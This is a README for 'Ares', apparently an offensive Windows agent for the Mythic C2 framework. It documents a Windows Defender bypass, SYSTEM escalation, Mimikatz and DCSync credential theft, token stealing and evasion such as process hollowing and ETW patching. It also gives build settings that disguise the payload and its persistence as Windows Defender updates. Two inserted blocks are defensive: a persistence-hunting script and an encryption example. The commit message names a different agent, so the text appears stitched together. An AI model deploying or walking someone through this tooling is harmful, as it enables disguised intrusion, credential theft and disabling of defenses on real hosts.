Ares-mythic/README.md
Aryma 224a0013d7 feat: add Ares payload type with agent code and documentation
This commit introduces the Apollo payload type for Mythic C2, including:
- Complete .NET agent codebase with modular architecture
- Multiple C2 profile implementations (HTTP, SMB, TCP, WebSocket)
- Extensive documentation with command references and MITRE ATT&CK mappings
- Agent utilities including UAC bypasses, injection techniques, and crypto modules
- Configuration files for build systems and development environments
- Sample binaries and resources for agent functionality

The Apollo agent provides Windows post-exploitation capabilities with a focus on modularity and extensibility, supporting various communication methods and injection techniques.
2026-04-14 12:27:18 +07:00

8.6 KiB

Ares - Advanced Windows Agent


Ares is a Windows agent for red team operations. It integrates the BlueHammer exploit with the Mythic C2 framework for penetration testing and security assessment.

🚀 Overview

Ares combines the BlueHammer Windows Defender exploit with Mythic C2 integration, providing:

  • Windows Defender bypass capabilities
  • SYSTEM privilege escalation
  • Multiple persistence mechanisms
  • Full Mythic C2 integration
  • Advanced evasion techniques

📋 Features

Core Capabilities

  • Windows Defender Bypass: Uses the BlueHammer exploit to disable Defender's security controls
  • SYSTEM Privileges: Multiple techniques for privilege escalation to NT AUTHORITY\SYSTEM
  • Persistence: Comprehensive persistence across registry, services, tasks, and startup
  • Mythic C2 Integration: Full command and control capabilities
  • Encrypted Communication: AES256 encryption with HMAC integrity

Advanced Features

  • P2P Communication: Peer-to-peer agent communication
  • Credential Operations: Credential tracking and manipulation
  • Code Execution: Unmanaged PE, .NET Assembly, and PowerShell execution
  • SOCKSv5 Support: Proxy capabilities for network operations
  • Domain Rotation: HTTP profile with callback-domain rotation and proxy support
  • Message Transform: Base64, NetBIOS, XOR encoding support

🛠️ Installation

Prerequisites

  • A running Mythic C2 server (the agent is installed and built on that host)
  • Windows target systems for deployment
  • Python 3.8+ for agent building

Installation from Mythic

As root:

./mythic-cli install github https://github.com/MythicAgents/Ares.git

As a non-root user:

sudo -E ./mythic-cli install github https://github.com/MythicAgents/Ares.git

Once installed, restart Mythic to build the agent.

Manual Building

  1. Clone the repository:
git clone https://github.com/MythicAgents/Ares.git
cd Ares
  2. Build the agent:
python build.py
  3. Deploy the agent:
python deploy.py

⚙️ Configuration

C2 Profile Configuration

Example HTTP profile configuration:

{
    "c2_profile": "http",
    "callback_host": "http://your-c2-server.com",
    "callback_port": 80,
    "callback_interval": 10,
    "callback_jitter": 23,
    "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"
    },
    "AESPSK": {
        "enc_key": "your-encryption-key",
        "dec_key": "your-decryption-key",
        "value": "aes256_hmac"
    }
}

enc_key and dec_key are base64-encoded 32-byte AES keys. Mythic can generate them for you when the payload is built; if you supply your own, use 32 random bytes, not a passphrase.

Build Parameters

{
    "output_type": "WinExe",
    "filename": "win-update.exe",
    "debug": true,
    "shellcode_bypass": "Continue on fail",
    "enable_keying": false
}

Set debug to false for operational builds: debug output is intended for development and is an easy detection artifact. The fixed filename is likewise a static indicator, so change it per engagement.

🎯 Usage

Agent Execution

Execute the agent on target systems:

win-update.exe

Command Examples

Windows Defender Bypass

bypass_defender

Privilege Escalation

getsystem

Persistence Establishment

establish_persistence

File Operations

# Download file
download -Path C:\sensitive\file.txt

# Upload file
upload -File local_file.txt -RemotePath C:\temp\file.txt

Code Execution

# Execute .NET assembly
execute_assembly -Assembly malware.exe -Arguments "-flag value"

# Execute PowerShell
powershell -Command "Get-Process"

# Execute COFF object file
execute_coff -Coff object.x64.o -Function go

🔧 Commands Reference

Core Commands

| Command | Syntax | Description |
|---|---|---|
| bypass_defender | bypass_defender | Bypass Windows Defender using the BlueHammer exploit |
| getsystem | getsystem | Gain SYSTEM privileges using multiple techniques |
| establish_persistence | establish_persistence | Establish multiple persistence mechanisms |
| assembly_inject | assembly_inject -PID [pid] -Assembly [assembly] | Execute a .NET assembly in a remote process |
| execute_assembly | execute_assembly -Assembly [assembly.exe] | Execute a registered .NET assembly |
| execute_pe | execute_pe -PE [binary.exe] | Execute a statically compiled executable |

File Operations

| Command | Syntax | Description |
|---|---|---|
| download | download -Path [path] | Download a file from the target system |
| upload | upload -File [file] -RemotePath [path] | Upload a file to the target system |
| cat | cat -Path [file] | Display file contents |
| cp | cp -Path [source] -Destination [dest] | Copy a file |
| mv | mv -Path [source] -Destination [dest] | Move a file |
| rm | rm -Path [file] | Remove a file |

System Operations

| Command | Syntax | Description |
|---|---|---|
| shell | shell -Command "command" | Execute a shell command |
| ps | ps | List processes |
| kill | kill -PID [pid] | Kill a process |
| ls | ls -Path [dir] | List directory contents |
| cd | cd -Path [dir] | Change directory |
| pwd | pwd | Print the working directory |

Network Operations

| Command | Syntax | Description |
|---|---|---|
| ifconfig | ifconfig | Get network adapters |
| netstat | netstat | Display network connections |
| net_dclist | net_dclist | List domain controllers |
| net_shares | net_shares | List network shares |

Credential Operations

| Command | Syntax | Description |
|---|---|---|
| mimikatz | mimikatz -Command "command" | Execute Mimikatz commands |
| dcsync | dcsync -Domain [domain] | DCSync domain credentials |
| make_token | make_token -Domain [domain] -User [user] -Password [pass] | Create an access token |
| steal_token | steal_token -PID [pid] | Steal a token from a process |

🛡️ Persistence Mechanisms

Registry Persistence

  • HKCU: Software\Microsoft\Windows\CurrentVersion\Run
  • HKLM: Software\Microsoft\Windows\CurrentVersion\Run

Service Persistence

  • Service Name: WinDefendUpdate
  • Run As: LocalSystem
  • Startup Type: Automatic

Scheduled Tasks

  • Task Name: WindowsDefenderMaintenance
  • Schedule: Hourly
  • Run As: SYSTEM

Startup Folder

  • Location: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
  • File Name: WindowsDefenderUpdate.exe

The service, the SYSTEM scheduled task and the HKLM Run key all need administrative rights to create; the HKCU Run key and the Startup folder entry work from a standard user context but persist only for that user. All four names are fixed in the agent, which makes them straightforward indicators for defenders.
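As an added example (written for this page, not code from Ares), the PowerShell below checks a host for exactly the artifacts this section names: the two Run keys, the WinDefendUpdate service, the WindowsDefenderMaintenance scheduled task, and WindowsDefenderUpdate.exe in each user's Startup folder. The artifact names are the README's; the output shape and the extra heuristics (flagging Run-key commands that point into a Temp directory, checking the Authenticode status of the startup binary) are this example's own choices. It is read-only and should be run from an elevated session so HKLM, the service query and the task library are readable. Genuine Defender tasks live under \Microsoft\Windows\Windows Defender\ in the Task Scheduler library, so a root-level task with this name is a signal by itself.

```powershell
# Added example for this page (not part of Ares). Read-only hunt for the
# persistence artifacts listed in the README. Run elevated.
# Artifact names come from the README; everything else is this example's own.

$Findings = [System.Collections.Generic.List[object]]::new()

function Add-Finding {
    param([string]$Source, [string]$Detail)
    $Findings.Add([pscustomobject]@{ Source = $Source; Detail = $Detail })
}

# 1. Run keys (HKCU and HKLM). Flag values that launch the README's startup
#    binary name or anything under a Temp directory ("Temp directory operation").
foreach ($Hive in 'HKCU', 'HKLM') {
    $Key = "${Hive}:\Software\Microsoft\Windows\CurrentVersion\Run"
    if (-not (Test-Path $Key)) { continue }
    $Props = Get-ItemProperty -Path $Key
    foreach ($Name in $Props.PSObject.Properties.Name) {
        if ($Name -like 'PS*') { continue }          # skip PSPath/PSParentPath metadata
        $Cmd = [string]$Props.$Name
        if ($Cmd -match 'WindowsDefenderUpdate\.exe|\\Temp\\') {
            Add-Finding "Run key ($Hive)" "$Name = $Cmd"
        }
    }
}

# 2. Service named in the README (LocalSystem, auto-start).
$Svc = Get-CimInstance Win32_Service -Filter "Name='WinDefendUpdate'"
if ($Svc) {
    Add-Finding 'Service' ("{0} StartMode={1} StartName={2} Path={3}" -f `
        $Svc.Name, $Svc.StartMode, $Svc.StartName, $Svc.PathName)
}

# 3. Scheduled task named in the README. Real Defender tasks sit under
#    \Microsoft\Windows\Windows Defender\, so note the TaskPath in the finding.
$Task = Get-ScheduledTask -TaskName 'WindowsDefenderMaintenance' -ErrorAction SilentlyContinue
if ($Task) {
    $Exec = ($Task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    Add-Finding 'Scheduled task' ("{0}{1} RunAs={2} Action={3}" -f `
        $Task.TaskPath, $Task.TaskName, $Task.Principal.UserId, $Exec)
}

# 4. Startup folders. %APPDATA% only covers the current user, so walk every
#    profile under C:\Users instead of expanding the variable.
foreach ($Profile in Get-ChildItem -Path 'C:\Users' -Directory -ErrorAction SilentlyContinue) {
    $Startup   = Join-Path $Profile.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
    $Candidate = Join-Path $Startup 'WindowsDefenderUpdate.exe'
    if (Test-Path $Candidate) {
        $Sig = Get-AuthenticodeSignature -FilePath $Candidate
        Add-Finding 'Startup folder' ("{0} (signature: {1})" -f $Candidate, $Sig.Status)
    }
}

if ($Findings.Count -eq 0) {
    Write-Output 'No persistence artifacts from the README were found.'
} else {
    $Findings | Format-Table -AutoSize
}
```

A clean result only means the documented names were not found; an operator who changed the service or task name will not be caught by this script, so treat it as a quick triage check rather than a complete detection.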

🔒 Security Features

Encryption

  • AES256-CBC: End-to-end encryption
  • HMAC-SHA256: Message integrity verification
  • Key Rotation: Configurable key rotation policies
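The following is an added example, written for this page and not code from Ares, Apollo or Mythic, showing how an aes256_hmac-style message is assembled and verified with the .NET crypto classes available from PowerShell. The wire layout it uses, base64( UUID || IV || AES-256-CBC ciphertext || HMAC-SHA256(IV || ciphertext) ), is an assumption modeled on the AESPSK format documented by Mythic and should be confirmed against the profile code; the function names, the demo key and UUID, and the sample plaintext are this example's own. The point it demonstrates is the receive path: check the HMAC with a constant-time comparison and discard the message before the ciphertext ever reaches the AES decryptor, so a tampered message cannot be turned into a padding oracle.

```powershell
# Added example for this page, not code from Ares or Mythic.
# Assumed layout (modeled on Mythic's documented aes256_hmac format):
#   base64( UUID(36 ASCII) || IV(16) || AES-256-CBC ciphertext || HMAC-SHA256(IV||ct)(32) )
# Key, UUID and plaintext below are constructed demo values.

function Protect-AgentMessage {
    param(
        [Parameter(Mandatory)][byte[]]$Key,        # 32-byte shared key (AESPSK enc_key, base64-decoded)
        [Parameter(Mandatory)][string]$AgentUuid,  # 36-char callback UUID, sent in the clear
        [Parameter(Mandatory)][string]$Plaintext
    )
    if ($Key.Length -ne 32)       { throw 'key must be 32 bytes for AES-256' }
    if ($AgentUuid.Length -ne 36) { throw 'UUID must be 36 characters' }

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.KeySize = 256
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $Key
    $aes.GenerateIV()                                   # fresh random IV for every message
    $iv   = $aes.IV
    $data = [System.Text.Encoding]::UTF8.GetBytes($Plaintext)
    $ct   = $aes.CreateEncryptor().TransformFinalBlock($data, 0, $data.Length)

    # Encrypt-then-MAC: the tag covers IV and ciphertext, never the plaintext.
    $hmac = [System.Security.Cryptography.HMACSHA256]::new($Key)
    $tag  = $hmac.ComputeHash([byte[]]($iv + $ct))
    $aes.Dispose(); $hmac.Dispose()

    $body = [byte[]]([System.Text.Encoding]::ASCII.GetBytes($AgentUuid) + $iv + $ct + $tag)
    return [Convert]::ToBase64String($body)
}

function Unprotect-AgentMessage {
    param(
        [Parameter(Mandatory)][byte[]]$Key,
        [Parameter(Mandatory)][string]$Encoded
    )
    $body = [Convert]::FromBase64String($Encoded)
    # Smallest valid message: UUID + IV + one padded block + tag.
    if ($body.Length -lt (36 + 16 + 16 + 32)) { throw 'message too short' }

    $uuid = [System.Text.Encoding]::ASCII.GetString($body, 0, 36)
    $iv   = [byte[]]($body[36..51])
    $ct   = [byte[]]($body[52..($body.Length - 33)])
    $tag  = [byte[]]($body[($body.Length - 32)..($body.Length - 1)])

    $hmac = [System.Security.Cryptography.HMACSHA256]::new($Key)
    $calc = $hmac.ComputeHash([byte[]]($iv + $ct))
    $hmac.Dispose()

    # Constant-time comparison: always touch all 32 bytes so timing does not
    # reveal how many leading tag bytes were correct.
    $diff = 0
    for ($i = 0; $i -lt 32; $i++) { $diff = $diff -bor ($calc[$i] -bxor $tag[$i]) }
    if ($diff -ne 0) { throw 'HMAC verification failed; message discarded before decryption' }

    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $pt = $aes.CreateDecryptor($Key, $iv).TransformFinalBlock($ct, 0, $ct.Length)
    $aes.Dispose()
    return [pscustomobject]@{ Uuid = $uuid; Plaintext = [System.Text.Encoding]::UTF8.GetString($pt) }
}

# --- Demo with constructed values (use 32 bytes from RandomNumberGenerator for a real key) ---
$key  = [byte[]](1..32)
$uuid = '00000000-0000-4000-8000-000000000000'
$msg  = Protect-AgentMessage -Key $key -AgentUuid $uuid -Plaintext '{"action":"checkin"}'
(Unprotect-AgentMessage -Key $key -Encoded $msg).Plaintext      # round-trips the JSON

# Flip one ciphertext byte: the tag check fails and the decryptor is never called.
$raw = [Convert]::FromBase64String($msg)
$raw[60] = $raw[60] -bxor 1
try   { Unprotect-AgentMessage -Key $key -Encoded ([Convert]::ToBase64String($raw)) }
catch { "rejected: $($_.Exception.Message)" }
```

Because the UUID travels in the clear ahead of the IV, the server can look up the per-callback key before it verifies anything; the HMAC is still checked over the IV and ciphertext only, which is what makes the order "verify, then decrypt" safe.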

Evasion Techniques

  • Process Hollowing: Advanced code injection
  • API Unhooking: Bypass security hooks
  • Direct Syscalls: Bypass user-mode hooks
  • Stack Spoofing: Evade stack-based detection

📊 Mythic Integration

C2 Communication

  • Check-in Interval: Configurable (default: 10 seconds)
  • Jitter: Percentage-based jitter (default: 23%)
  • Encryption: AES256 with HMAC integrity
  • Proxy Support: HTTP proxies and domain fronting

Task Processing

  • Asynchronous Processing: Non-blocking task execution
  • Result Reporting: Comprehensive result reporting
  • Error Handling: Robust error handling and recovery
  • Status Updates: Real-time task status updates

🚨 Detection Evasion

Ares employs multiple techniques to evade detection:

Behavioral Evasion

  • Legitimate process names
  • Windows Defender-related service names
  • Temp directory operation
  • Fileless execution where possible

Technical Evasion

  • API unhooking
  • Direct system calls
  • Stack spoofing
  • Process hollowing
  • ETW patching

⚠️ Disclaimer

This tool is intended for:

  • Authorized penetration testing
  • Security research and education
  • Red team operations with proper authorization

Unauthorized use against systems you do not own or have explicit permission to test is illegal.

🐛 Issues and Support

Report issues and feature requests:

📄 License

This project is licensed under the MIT License. See the LICENSE file for details.

🙏 Credits

  • BlueHammer Researchers: For the Windows Defender exploit
  • Mythic C2 Team: For the excellent C2 framework
  • Security Researchers: For ongoing research and techniques
  • Red Team Community: For testing and feedback

🔗 Resources


Ares Team | Advanced Red Team Operations | 2026